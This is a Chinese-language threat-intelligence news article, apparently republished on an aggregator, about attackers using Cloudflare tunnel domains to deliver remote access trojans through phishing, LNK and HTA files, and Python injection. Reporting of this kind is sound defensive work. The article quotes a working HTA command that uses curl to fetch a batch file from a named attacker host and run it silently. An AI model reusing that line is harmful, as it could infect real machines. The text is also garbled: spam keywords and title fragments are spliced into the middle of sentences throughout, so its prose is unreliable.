您现在的位置是:人工智能 >>正文
黑客滥用 Cloudflare 隧道基础设施传播多种远程访问木马
人工智能959人已围观
简介网络安全专家发现一起复杂攻击活动,攻击者利用Cloudflare的隧道基础设施分发多种远程访问木马RAT)。该基础设施自2024年2月以来展现出极强的持久性,作为恶意文件和木马的分发平台,使攻击者能够 ...
网络安全专家发现一起复杂攻击活动,黑客攻击者利用Cloudflare的滥用隧道基础设施分发多种远程访问木马(RAT) 。
该基础设施自2024年2月以来展现出极强的隧道设施持久性,作为恶意文件和木马的基础分发平台 ,使攻击者能够未经授权访问受害者系统 。传播
包括Forcepoint、多种Fortinet、远程Orange和Proofpoint在内的访问安全厂商已记录这一持续性威胁 ,云计算强调其不断演变的木马特性以及对全球组织日益增长的影响。

主要感染途径始于包含恶意附件的黑客钓鱼邮件,这些附件伪装成发票或订单文件。滥用
这类邮件通常制造虚假紧迫感,隧道设施并可能包含伪造的基础对话记录和回复以显得真实可信。
附件通常采用"application/windows-library+xml"文件格式,传播由于相比二进制文件看似无害,香港云服务器多种经常能绕过电子邮件安全网关。
当用户打开文件时,会建立与托管在Cloudflare隧道基础设施上的远程WebDav资源的连接。
攻击基础设施分析Sekoia威胁检测与研究(TDR)团队持续监控这一攻击基础设施,内部代号为"Cloudflare隧道基础设施传播多种RAT" 。
分析显示 ,攻击采用复杂的多阶段感染链,运用多种混淆技术规避检测系统 。源码下载这种复杂性表明,即便在2025年,威胁行为体仍在开发创新方法来绕过现代安全控制措施。
攻击者利用带有"trycloudflare.com"后缀的域名(如"malawi-light-pill-bolt.trycloudflare.com"和"players-time-corresponding-th.trycloudflare.com"等)托管恶意内容。该基础设施最终投放的载荷会在受感染系统上建立持久远程访问,可能导致数据窃取和进一步网络入侵 。
感染链技术细节感染过程始于用户与伪装成PDF文档的LNK文件交互 。该快捷方式并非打开合法文档,模板下载而是从同一远程服务器执行HTA文件 。HTA内容揭示攻击进展:
复制`Set oShell = CreateObject("WScript.Shell") oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false self. Close`1.此脚本触发BAT文件安装Python并执行混淆的Python代码 ,随后将下一阶段载荷注入"notepad.exe"进程 。

注入notepad.exe进程(来源 :Sekoia)
为实现持久化 ,恶意软件创建启动项,包含两个VBS文件和另一个放置在Windows启动文件夹中的BAT文件。
最终阶段使用PowerShell反射加载从JPEG图像下载的载荷(内含base64编码的建站模板载荷),通过"duckdns.org"等动态DNS服务建立与命令控制服务器的RAT连接 。

感染链示意图(来源 :Sekoia)
通过涉及Windows-library文件、LNK文件、HTA执行和Python注入的复杂多阶段过程分发AsyncRAT的感染链
该攻击活动的演变表明 ,威胁行为体持续调整技术以绕过安全控制 ,凸显了采用多层检测方法和持续监控类似攻击模式的免费模板重要性。
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“信息技术视野”。http://www.bziz.cn/news/16b499979.html
下一篇:OWASP发生大规模数据泄露
相关文章
八条黄金准则,解决API安全问题
人工智能API应用程序编程接口)是现代软件开发中不可或缺的一部分。它们允许不同的应用程序之间共享数据和功能,从而促进了软件系统的整合和互操作性。然而,随着API使用的普及,安全性问题也开始浮出水面。API安全 ...
【人工智能】
阅读更多Excel设置下拉列表的条件的方法教程
人工智能excel表格是一款非常好用的专业数据处理的软件,其中的功能非常强大,很多小伙伴都在使用。如果我们需要在Excel表格中为下拉列表设置条件,小伙伴们知道具体该如何进行操作吗,其实操作方法是非常简单的, ...
【人工智能】
阅读更多华为荣耀9发布会视频直播地址 华为荣耀9发布会
人工智能网上曝光了一张疑似华为荣耀9的宣传图,上面写着华为荣耀的新品将会在6月27日于德国柏林正式发布。看样子应该荣耀分为海外版和国行,国行版华为荣耀9的发布时间据悉为6月20日。根据曝光的消息,华为荣耀9搭 ...
【人工智能】
阅读更多
热门文章
最新文章
友情链接
- 数据中心在冷却、成本和二氧化碳减排方面均未达到目标
- 探索bcd-458wdvmu1的卓越性能和功能(一款引领技术创新的多功能设备)
- 谷歌 Chrome 零日漏洞遭广泛利用,可执行任意代码
- Realtek 蓝牙安全连接配对漏洞可导致攻击者发起拒绝服务攻击
- 微软联合执法机构捣毁全球 Lumma 窃密软件网络
- 备份系统也能成为“核心设施”?瑞数信息给出了一套“有韧性”解题思路!
- 你的App每三分钟就会遭遇一次攻击
- 企业数据库险遭百亿损失,瑞数DDR全周期防护破解“暗雷”阴影
- W7手动还原系统教程(一步步教您如何使用W7手动还原系统,保护和修复您的计算机)
- 神舟战神K540D-i7D2笔记本电脑的性能和用户体验(一款高性能笔记本电脑的推荐及评测) 源码库网站建设b2b信息平台云服务器亿华云香港物理机企业服务器